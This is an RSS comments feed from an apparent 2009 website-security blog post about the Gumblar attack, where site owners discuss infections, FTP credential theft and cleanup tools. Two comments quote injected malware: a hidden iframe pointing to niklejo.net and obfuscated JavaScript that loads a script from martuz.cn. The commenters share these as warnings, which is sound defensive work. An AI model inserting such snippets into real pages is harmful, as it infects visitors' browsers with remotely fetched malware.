<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.</title>
	<atom:link href="http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Sun, 05 Feb 2012 10:06:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Wayne</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1999</link>
		<dc:creator>Wayne</dc:creator>
		<pubDate>Fri, 07 Aug 2009 11:12:47 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1999</guid>
		<description>I cannot recommend 

http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35

Enough.

Chris saved me from hours and hours of work with his Antivirus program to scan website directories!

Again Thanks Chris!!!</description>
		<content:encoded><![CDATA[<p>I cannot recommend </p>
<p><a href="http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35" rel="nofollow">http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35</a></p>
<p>Enough.</p>
<p>Chris saved me from hours and hours of work with his Antivirus program to scan website directories!</p>
<p>Again Thanks Chris!!!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Chris</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1426</link>
		<dc:creator>Chris</dc:creator>
		<pubDate>Fri, 12 Jun 2009 18:38:59 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1426</guid>
		<description>@Ali,

we&#039;ve already developed an application that scans for and removes pre-defined and/or any given malicious code from your files.

currently it scans for 22 suspicious codes (possible threats - no action taken), and 25 virus definitions (actual viruses - file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date.

please check it out here:
http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35</description>
		<content:encoded><![CDATA[<p>@Ali,</p>
<p>we&#8217;ve already developed an application that scans for and removes pre-defined and/or any given malicious code from your files.</p>
<p>currently it scans for 22 suspicious codes (possible threats &#8211; no action taken), and 25 virus definitions (actual viruses &#8211; file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date.</p>
<p>please check it out here:<br />
<a href="http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35" rel="nofollow">http://www.axxis.gr/index.php?option=com_content&amp;view=article&amp;id=35</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Internet Evolution - Gideon J. Lenkey - Gumblar: Botnet With a Twist</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1421</link>
		<dc:creator>Internet Evolution - Gideon J. Lenkey - Gumblar: Botnet With a Twist</dc:creator>
		<pubDate>Fri, 12 Jun 2009 02:47:44 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1421</guid>
		<description>[...]     Digg &#160;  Del.icio.us &#160;  Reddit &#160;  Email This By now you&#039;ve probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web [...]</description>
		<content:encoded><![CDATA[<p>[...]     Digg &nbsp;  Del.icio.us &nbsp;  Reddit &nbsp;  Email This By now you&#8217;ve probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ali</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1227</link>
		<dc:creator>Ali</dc:creator>
		<pubDate>Mon, 18 May 2009 23:16:49 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1227</guid>
		<description>oops, this iframe that is:
iframe src=&quot;http ://niklejo .net/?click=2A909B&quot; width=1 height=1 style=&quot;visibility:hidden;position:absolute&quot;&gt;</description>
		<content:encoded><![CDATA[<p>oops, this iframe that is:<br />
iframe src=&#8221;http ://niklejo .net/?click=2A909B&#8221; width=1 height=1 style=&#8221;visibility:hidden;position:absolute&#8221;></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ali</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1226</link>
		<dc:creator>Ali</dc:creator>
		<pubDate>Mon, 18 May 2009 23:16:04 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1226</guid>
		<description>Speaking of the new variant, I saw this iFrame injected all over my pages as well:

</description>
		<content:encoded><![CDATA[<p>Speaking of the new variant, I saw this iFrame injected all over my pages as well:</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1215</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sun, 17 May 2009 21:03:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1215</guid>
		<description>Thanks,

I noticed the change in the script too. I&#039;m going to blog about it on Monday.</description>
		<content:encoded><![CDATA[<p>Thanks,</p>
<p>I noticed the change in the script too. I&#8217;m going to blog about it on Monday.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: G`nome</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1213</link>
		<dc:creator>G`nome</dc:creator>
		<pubDate>Sun, 17 May 2009 17:08:18 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1213</guid>
		<description>Hi

I just want warn to everyone regarding &quot;martuz.cn&quot;.

Gumblar.cn already removed A record from their DNS, it meant gumblar no longer resolved at this time.
However, malicious attacker already replaced &quot;martuz.cn&quot; instead of gumblar, almost compromised site has been re-injected malicious code like this...

 var a=&quot;ScriptEngine&quot;,b=&quot;Version()+&quot;,j=&quot;&quot;,u=navigator.userAgent;if((u.indexOf
 (&quot;Chrome&quot;)0)&amp;&amp;(u.indexOf(&quot;NT 6&quot;)&lt;0)&amp;&amp;(document.cookie.indexOf(&quot;miek=1&quot;)&lt;0)&amp;&amp;(typeof(zrvzts)!=typeof(&quot;A&quot;)))
 {zrvzts=&quot;A&quot;;eval(&quot;if(window.&quot;+a+&quot;) j=j+&quot;+a+&quot;Major&quot;+b+a+&quot;Minor&quot;+b+a+&quot;Build&quot;+b+&quot;j;&quot;);document.write(&quot;{script
 src=//mar&quot;+&quot;tuz.cn/vid/?id=&quot;+j+&quot;}{\/script}&quot;);}

It seems small changed that they want reject &quot;Chrome&quot;. I found several site that compromised but I can&#039;t do anything because of my English is too poorly. 

Symantec already blocked due to Trojan Horse.
https://safeweb.norton.com/report/show?name=martuz.cn

Also these IPs are blacklisted by SBL.
http://www.spamhaus.org/

I wish attention earlier to stop spread this &quot;martuz pandemic&quot;.</description>
		<content:encoded><![CDATA[<p>Hi</p>
<p>I just want warn to everyone regarding &#8220;martuz.cn&#8221;.</p>
<p>Gumblar.cn already removed A record from their DNS, it meant gumblar no longer resolved at this time.<br />
However, malicious attacker already replaced &#8220;martuz.cn&#8221; instead of gumblar, almost compromised site has been re-injected malicious code like this&#8230;</p>
<p> var a=&#8221;ScriptEngine&#8221;,b=&#8221;Version()+&#8221;,j=&#8221;",u=navigator.userAgent;if((u.indexOf<br />
 (&#8220;Chrome&#8221;)0)&amp;&amp;(u.indexOf(&#8220;NT 6&#8243;)&lt;0)&amp;&amp;(document.cookie.indexOf(&#8220;miek=1&#8243;)&lt;0)&amp;&amp;(typeof(zrvzts)!=typeof(&#8220;A&#8221;)))<br />
 {zrvzts=&#8221;A&#8221;;eval(&#8220;if(window.&#8221;+a+&#8221;) j=j+&#8221;+a+&#8221;Major&#8221;+b+a+&#8221;Minor&#8221;+b+a+&#8221;Build&#8221;+b+&#8221;j;&#8221;);document.write(&#8220;{script<br />
 src=//mar&#8221;+&#8221;tuz.cn/vid/?id=&#8221;+j+&#8221;}{\/script}&#8221;);}</p>
<p>It seems small changed that they want reject &#8220;Chrome&#8221;. I found several site that compromised but I can&#8217;t do anything because of my English is too poorly. </p>
<p>Symantec already blocked due to Trojan Horse.<br />
<a href="https://safeweb.norton.com/report/show?name=martuz.cn" rel="nofollow">https://safeweb.norton.com/report/show?name=martuz.cn</a></p>
<p>Also these IPs are blacklisted by SBL.<br />
<a href="http://www.spamhaus.org/" rel="nofollow">http://www.spamhaus.org/</a></p>
<p>I wish attention earlier to stop spread this &#8220;martuz pandemic&#8221;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ali</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1211</link>
		<dc:creator>Ali</dc:creator>
		<pubDate>Sun, 17 May 2009 11:12:01 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1211</guid>
		<description>Hey Denis,

I read the articles and I know what you&#039;re saying in terms of hacked FTP credentials 

It&#039;s odd though, i have several sites on one host and only one was infected even though I had passwords for several others in my filezilla profile.

In the end, I was forced to take down my site. because I had 539 infected files.  

I&#039;m writing an app to go through the files and clean them. I haven&#039;t seen anything like that out there as yet.</description>
		<content:encoded><![CDATA[<p>Hey Denis,</p>
<p>I read the articles and I know what you&#8217;re saying in terms of hacked FTP credentials </p>
<p>It&#8217;s odd though, i have several sites on one host and only one was infected even though I had passwords for several others in my filezilla profile.</p>
<p>In the end, I was forced to take down my site. because I had 539 infected files.  </p>
<p>I&#8217;m writing an app to go through the files and clean them. I haven&#8217;t seen anything like that out there as yet.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1210</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sun, 17 May 2009 10:51:05 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1210</guid>
		<description>You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame.</description>
		<content:encoded><![CDATA[<p>You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ali</title>
		<link>http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1201</link>
		<dc:creator>Ali</dc:creator>
		<pubDate>Sun, 17 May 2009 01:16:12 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=199#comment-1201</guid>
		<description>We had gunblar affect our site as well.  I&#039;m starting to wonder if the issue is not a vulnerability in Joomla or some joomla component.   Has anyone found the root cause of how their site got infected in the first place?

&lt;em&gt;Edit by Denis: I&#039;ve removed your site from you signature since it is infected with both Gumblar and the &lt;a href=&quot;http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/&quot; rel=&quot;nofollow&quot;&gt;malicious iframe&lt;/a&gt;. 
&lt;a href=&quot;http://www.UnmaskParasites.com/security-report/?page=bcproject.info&quot; rel=&quot;nofollow&quot;&gt;Unmask Parasites report&lt;/a&gt;.&lt;/em&gt;</description>
		<content:encoded><![CDATA[<p>We had gunblar affect our site as well.  I&#8217;m starting to wonder if the issue is not a vulnerability in Joomla or some joomla component.   Has anyone found the root cause of how their site got infected in the first place?</p>
<p><em>Edit by Denis: I&#8217;ve removed your site from you signature since it is infected with both Gumblar and the <a href="http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/" rel="nofollow">malicious iframe</a>.<br />
<a href="http://www.UnmaskParasites.com/security-report/?page=bcproject.info" rel="nofollow">Unmask Parasites report</a>.</em></p>
]]></content:encoded>
	</item>
</channel>
</rss>

